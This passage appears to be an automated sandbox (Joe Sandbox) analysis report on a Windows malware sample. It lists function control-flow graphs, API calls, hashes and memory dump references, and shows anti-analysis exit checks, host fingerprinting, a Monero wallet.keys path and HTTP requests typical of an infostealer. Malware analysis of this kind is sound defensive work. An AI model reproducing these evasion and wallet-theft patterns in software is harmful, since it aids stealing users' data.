1327->1314 1350 9218c0-9218c3 1328->1350 1351 9218ca 1328->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1314 1334->1333 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 9218a8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 009217C5
                          • ExitProcess.KERNEL32 ref: 009217D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: e257b7fa2b8794081521078ef03a0df23ee604560df507cfaef85444adae8a02
                          • Instruction ID: 406f5666de3074c059dd73f1acec10997fc42eca3861da86192e26ef061d63c2
                          • Opcode Fuzzy Hash: e257b7fa2b8794081521078ef03a0df23ee604560df507cfaef85444adae8a02
                          • Instruction Fuzzy Hash: C5515EB9A04219EFCB04DFA0E994BBE77B9BF94704F108448E41567344D774E9A1CF62
                          Function 00927500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 927500-92754a GetWindowsDirectoryA 1357 927553-9275c7 GetVolumeInformationA call 928d00 * 3 1356->1357 1358 92754c 1356->1358 1365 9275d8-9275df 1357->1365 1358->1357 1366 9275e1-9275fa call 928d00 1365->1366 1367 9275fc-927617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 927628-927658 wsprintfA call 92a740 1367->1369 1370 927619-927626 call 92a740 1367->1370 1377 92767e-92768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00927542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0092760A
                          • wsprintfA.USER32 ref: 00927640
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                          • Instruction ID: b02316957ef1892a5b926a535e718bd6fb64d1c87cd350b7bd84443d3ae7b451
                          • Opcode Fuzzy Hash: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                          • Instruction Fuzzy Hash: F34181B1D05358ABDB10DF94EC45BEEBBB8EF48704F100199F50977284DB786A44CBA5
                          Function 009269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010431E0), ref: 009298A1
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010430F0), ref: 009298BA
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043240), ref: 009298D2
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043180), ref: 009298EA
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043258), ref: 00929903
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,0104A018), ref: 0092991B
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01035970), ref: 00929933
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010359F0), ref: 0092994C
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010431C8), ref: 00929964
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043288), ref: 0092997C
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01042FE8), ref: 00929995
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010432A0), ref: 009299AD
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01035710), ref: 009299C5
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010432B8), ref: 009299DE
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 009111D0: ExitProcess.KERNEL32 ref: 00911211
                            • Part of subcall function 00911160: GetSystemInfo.KERNEL32(?), ref: 0091116A
                            • Part of subcall function 00911160: ExitProcess.KERNEL32 ref: 0091117E
                            • Part of subcall function 00911110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                            • Part of subcall function 00911110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                            • Part of subcall function 00911110: ExitProcess.KERNEL32 ref: 00911143
                            • Part of subcall function 00911220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                            • Part of subcall function 00911220: ExitProcess.KERNEL32 ref: 00911294
                            • Part of subcall function 00926770: GetUserDefaultLangID.KERNEL32 ref: 00926774
                            • Part of subcall function 00911190: ExitProcess.KERNEL32 ref: 009111C6
                            • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                            • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                            • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                            • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                            • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                            • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                          • Sleep.KERNEL32(00001770), ref: 00926B04
                          • CloseHandle.KERNEL32(?,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                          • ExitProcess.KERNEL32 ref: 00926B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                          • Instruction ID: 4978d9055bc26413ef4afb0b049c42c0a5ea1102fdcecde83084502cdc4e5b7a
                          • Opcode Fuzzy Hash: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                          • Instruction Fuzzy Hash: A3312172A04228ABDB04FBF0FC57BEEB778AF94341F104518F212B2199DF745945CAA6
                          Function 00926AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 926af3 1437 926b0a 1436->1437 1439 926aba-926ad7 call 92aad0 OpenEventA 1437->1439 1440 926b0c-926b22 call 926920 call 925b10 CloseHandle ExitProcess 1437->1440 1445 926af5-926b04 CloseHandle Sleep 1439->1445 1446 926ad9-926af1 call 92aad0 CreateEventA 1439->1446 1445->1437 1446->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                          • Sleep.KERNEL32(00001770), ref: 00926B04
                          • CloseHandle.KERNEL32(?,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                          • ExitProcess.KERNEL32 ref: 00926B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                          • Instruction ID: f213d2ce21cdaa48c3a1686af65c2daa6e60e234a3258933bed02b7d26088f6a
                          • Opcode Fuzzy Hash: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                          • Instruction Fuzzy Hash: 1EF05E30944329EBE710ABA0EC16BBD7B34EF54702F104A54B502B25C9CFB05940D656
                          Function 009147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                          • Instruction ID: c096f88b55bec928c044c6a19352ee664351af0adc709922471dbca84c76208d
                          • Opcode Fuzzy Hash: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                          • Instruction Fuzzy Hash: AA210EB1D00209ABDF14DFA4E845BDE7B75FF45320F108625F915A7291EB706A05CB91
                          Function 009251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                            • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                            • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                            • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                            • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                            • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                          • Instruction ID: 2facb571303a0009cefb9ed47e2a051c374560baba731545e8c7635dcc9c16ff
                          • Opcode Fuzzy Hash: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                          • Instruction Fuzzy Hash: A8115231900118ABCB14FF70ED52BED737DAF90300F404558F91A5B1A6EF34AB09CA95
                          Function 00911220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1493 911220-911247 call 9289b0 GlobalMemoryStatusEx 1496 911273-91127a 1493->1496 1497 911249-911271 call 92da00 * 2 1493->1497 1499 911281-911285 1496->1499 1497->1499 1501 911287 1499->1501 1502 91129a-91129d 1499->1502 1504 911292-911294 ExitProcess 1501->1504 1505 911289-911290 1501->1505 1505->1502 1505->1504
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                          • ExitProcess.KERNEL32 ref: 00911294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                          • Instruction ID: 5432d1320e76f09028c22378c4ff5381f47667cde79dd030ef8d2a3626b243ae
                          • Opcode Fuzzy Hash: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                          • Instruction Fuzzy Hash: C6016DB0E4531CBBEF10DBE0DC4ABDEBBB8AB54702F208548E705B62C0DB7455818B99
                          Function 00911110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                          • ExitProcess.KERNEL32 ref: 00911143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                          • Instruction ID: 2337623b8ded51157699efb65a8e31ed59ec45292632909cc8150050a3d08c25
                          • Opcode Fuzzy Hash: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                          • Instruction Fuzzy Hash: DAE0E670A4534CFBE710ABA09C0AB497A78AB04B12F104194F709775D0DAB52A409699
                          Function 009110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009110B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009110F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
